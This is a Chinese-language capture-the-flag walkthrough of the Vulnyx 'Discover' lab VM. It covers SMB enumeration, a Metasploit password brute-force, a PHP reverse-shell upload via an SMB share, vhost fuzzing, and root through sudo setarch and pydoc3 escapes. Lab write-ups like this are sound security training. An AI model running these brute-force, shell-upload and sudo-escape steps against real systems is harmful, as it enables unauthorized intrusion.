Vulnyx-Discover-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.232  08:00:27:8a:bf:4d       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e1:d8:58       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.052 seconds (124.76 hosts/sec). 4 responded
❯ export ip=192.168.60.232
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.232:22
Open 192.168.60.232:80
Open 192.168.60.232:81
Open 192.168.60.232:139
Open 192.168.60.232:445
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-06 08:24 CST
Initiating ARP Ping Scan at 08:24
Scanning 192.168.60.232 [1 port]
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 08:24 (0:00:00 remaining)
Completed ARP Ping Scan at 08:24, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:24
Completed Parallel DNS resolution of 1 host. at 08:24, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:24
Scanning 192.168.60.232 [5 ports]
Discovered open port 81/tcp on 192.168.60.232
Discovered open port 80/tcp on 192.168.60.232
Discovered open port 445/tcp on 192.168.60.232
Discovered open port 22/tcp on 192.168.60.232
Discovered open port 139/tcp on 192.168.60.232
Completed SYN Stealth Scan at 08:24, 0.04s elapsed (5 total ports)
Nmap scan report for 192.168.60.232
Host is up, received arp-response (0.0017s latency).
Scanned at 2025-03-06 08:24:14 CST for 0s

PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack ttl 64
80/tcp  open  http         syn-ack ttl 64
81/tcp  open  hosts2-ns    syn-ack ttl 64
139/tcp open  netbios-ssn  syn-ack ttl 64
445/tcp open  microsoft-ds syn-ack ttl 64
MAC Address: 08:00:27:8A:BF:4D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
           Raw packets sent: 6 (248B) | Rcvd: 6 (248B)

发现开放了SMB服务

先看看80端口，尝试枚举一下目录

啥信息也没有，只有index.html中显示Good!

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.232
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 15]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

SMB爆破

尝试枚举一下smb服务

得到两个用户 ken takeshi

❯ enum4linux -a $ip
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar  6 08:24:51 2025

 =========================================( Target Information )=========================================

Target ........... 192.168.60.232
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.60.232 )===========================


[+] Got domain/workgroup name: WORKGROUP


 ===============================( Nbtstat Information for 192.168.60.232 )===============================

Looking up status of 192.168.60.232
        DISCOVER        <00> -         B <ACTIVE>  Workstation Service
        DISCOVER        <03> -         B <ACTIVE>  Messenger Service
        DISCOVER        <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ==================================( Session Check on 192.168.60.232 )==================================


[+] Server 192.168.60.232 allows sessions using username '', password ''


 ===============================( Getting domain SID for 192.168.60.232 )===============================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


 ==================================( OS information on 192.168.60.232 )==================================


[E] Can't get OS info with smbclient


[+] Got OS info for 192.168.60.232 from srvinfo:
        DISCOVER       Wk Sv PrQ Unx NT SNT Samba 4.13.13-Debian
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03


 ======================================( Users on 192.168.60.232 )======================================

index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: ken  Name:   Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: takeshi      Name:   Desc:

user:[ken] rid:[0x3e8]
user:[takeshi] rid:[0x3e9]

 ================================( Share Enumeration on 192.168.60.232 )================================

smbXcli_negprot_smb1_done: No compatible protocol selected by server.

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.13.13-Debian)
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.60.232 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.60.232

//192.168.60.232/print$ Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.60.232/IPC$   Mapping: N/A Listing: N/A Writing: N/A

 ===========================( Password Policy Information for 192.168.60.232 )===========================



[+] Attaching to 192.168.60.232 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] DISCOVER
        [+] Builtin

[+] Password Info for Domain: DISCOVER

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes



[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 5


 ======================================( Groups on 192.168.60.232 )======================================


[+] Getting builtin groups:


[+]  Getting builtin group memberships:


[+]  Getting local groups:


[+]  Getting local group memberships:


[+]  Getting domain groups:


[+]  Getting domain group memberships:


 =================( Users on 192.168.60.232 via RID cycling (RIDS: 500-550,1000-1050) )=================


[I] Found new SID:
S-1-22-1

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\ken (Local User)
S-1-22-1-1001 Unix User\takeshi (Local User)

[+] Enumerating users using SID S-1-5-21-4197875319-946574990-1670565427 and logon username '', password ''

S-1-5-21-4197875319-946574990-1670565427-501 DISCOVER\nobody (Local User)
S-1-5-21-4197875319-946574990-1670565427-513 DISCOVER\None (Domain Group)
S-1-5-21-4197875319-946574990-1670565427-1000 DISCOVER\ken (Local User)
S-1-5-21-4197875319-946574990-1670565427-1001 DISCOVER\takeshi (Local User)

 ==============================( Getting printer info for 192.168.60.232 )==============================

No printers returned.


enum4linux complete on Thu Mar  6 08:25:06 2025

没其他任何信息了，只能尝试爆破smb服务

结果hydra不支持SMBv1版本的

❯ hydra -l ken -P /usr/share/wordlists/rockyou.txt smb://$ip -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-06 08:50:08
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.60.232:445/
[ERROR] target smb://192.168.60.232:445/ does not support SMBv1

利用msfconsole的smb_login模块进行爆破

得到smb凭证ken:kenken

❯ msfconsole
Metasploit tip: You can pivot connections over sessions started with the
ssh_login modules


      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx
  lOOOOOOOO.         ;d;         ,OOOOOOOOl
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.
   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl
      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;
       .dOOo   .OOOOocccxOOOO.   xOOd.
         ,kOl  .OOOOOOOOOOOOO. .dOk,
           :kk;.OOOOOOOOOOOOO.cOk:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v6.4.38-dev                          ]
+ -- --=[ 2467 exploits - 1273 auxiliary - 431 post       ]
+ -- --=[ 1478 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search smb_login

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_login  .                normal  No     SMB Login Check Scanner


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_login

msf6 > use 0
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   ANONYMOUS_LOGIN    false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   CreateSession      false            no        Create a new session for every successful login
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
                                                 tml
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_login) > set SMBUser ken
SMBUser => ken
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/smb/smb_login) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.60.232
RHOSTS => 192.168.60.232
msf6 auxiliary(scanner/smb/smb_login) > exploit

…………省略…………
[+] 192.168.60.232:445    - 192.168.60.232:445 - Success: '.\ken:kenken'

smbclient连接一下

❯ smbclient -U ken  -L //$ip
Password for [WORKGROUP\ken]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.13.13-Debian)
        ken             Disk      File Upload Path
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.60.232 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
❯ smbclient -U ken  //$ip/ken
Password for [WORKGROUP\ken]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Jul  4 22:47:53 2023
  ..                                  D        0  Tue Jul  4 05:19:50 2023
  index.html                          N       15  Tue Jul  4 18:33:20 2023

                7173040 blocks of size 1024. 4558828 blocks available
smb: \> get index.html
getting file \index.html of size 15 as index.html (2.4 KiloBytes/sec) (average 2.4 KiloBytes/sec)
smb: \>

发现在ken的共享文件夹存在index.html

下载到本地后，查看一下，就是80端口上的页面

❯ cat index.html
<h2>Good!</h2>

那我们尝试传一个反弹shell上去

smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (1341.8 kb/s) (average 490.7 kb/s)

然而发现并不解析文件内容，只会以文本的形式读取

子域名枚举

看了一下WP，发现在81端口可扫到/under_construction

我之前一直屏蔽403的返回，难怪扫不到，因为403未授权拒绝了，拿到也没啥用

❯ gobuster dir -u "http://$ip:81" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.232:81
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

/index.html           (Status: 200) [Size: 15]
/under_construction   (Status: 403) [Size: 279]
Progress: 243098 / 1102800 (22.04%)
===============================================================
Finished
===============================================================

不过在这个靶机上是可以利用POST请求来获取信息的

得到一个域名todiscover.nyx

❯ curl http://192.168.60.232:81/under_construction/ -X POST
<!DOCTYPE html>
<html>
<head>
  <title>Under Construction</title>
………………省略………………
  </style>
</head>
<body>
  <div class="container">
    <div>
      <h1>Under Construction</h1>
      <p>We are working to improve our website.</p>
      <p>contact: [email protected]</p>
    </div>
  </div>
</body>
</html>

编辑一下hosts，添加域名

模糊测试一下，枚举子域名

因为todiscover.nyx正常利用GET去请求会显示403报错，所以模糊测试的时候需要添加一个-X POST参数

尝试访问一下我们之前smb上传的文件

❯ wfuzz -c -X POST -u "http://todiscover.nyx/php-reverse-shell.php" -H "HOST:FUZZ.todiscover.nyx" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 11
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://todiscover.nyx/php-reverse-shell.php
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000015484:   200        2 L      14 W       92 Ch       "smbc - smbc"

Total time: 71.72552
Processed Requests: 114441
Filtered Requests: 114440
Requests/sec.: 1595.540

发现存在smbc.todiscover.nyx的子域名

编辑一下hosts，添加域名

curl一下反弹shell，在这个子域下php文件是可以被解析的

用户提权

监听端口，拿个user先

❯ pwncat-cs -lp 4444
[09:24:09] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
bound to 0.0.0.0:4444 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[09:25:38] received connection from               bind.py:84
           192.168.60.232:60458
[09:25:38] 0.0.0.0:4444: upgrading from       manager.py:957
           /usr/bin/dash to /usr/bin/bash
[09:25:39] 192.168.60.232:60458: registered   manager.py:957
           new host w/ db
(local) pwncat$                                                                                     
(remote) ken@discover:/$ cd ~
(remote) ken@discover:/home/ken$ cat user.txt
6250095210f0c82aea6330a1269f8d97

用户ken拥有sudo权限可以执行setarch

正常提权至takeshi

Root提权

同时takeshi也拥有sudo权限执行pydoc3

(remote) ken@discover:/home/ken$ sudo -l
Matching Defaults entries for ken on discover:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ken may run the following commands on discover:
    (takeshi) NOPASSWD: /usr/bin/setarch
(remote) ken@discover:/home/ken$ sudo -u takeshi /usr/bin/setarch $(arch) /bin/bash                 
takeshi@discover:/home/ken$ sudo -l
Matching Defaults entries for takeshi on discover:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User takeshi may run the following commands on discover:
    (root) NOPASSWD: /usr/bin/pydoc3

稍微查询一下pydoc3的用法

-k参数查询说明会调用less正常利用!/bin/bash提权即可

搜索关键字：pydoc3 -k <keyword>，在所有可用模块的概要中搜索指定关键字

启动HTTP服务器：

• 指定主机名：pydoc3 -n <hostname>
• 指定端口：pydoc3 -p <port>
• 任意端口并启动浏览器：pydoc3 -b

takeshi@discover:/tmp$ sudo /usr/bin/pydoc3 k socket
No Python documentation found for 'k'.
Use help() to get the interactive help utility.
Use help(str) for help on the str class.

root@discover:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@discover:/tmp# cat /root/root.txt
d1fbb1fc68df7c8bdb6160ef34015ad1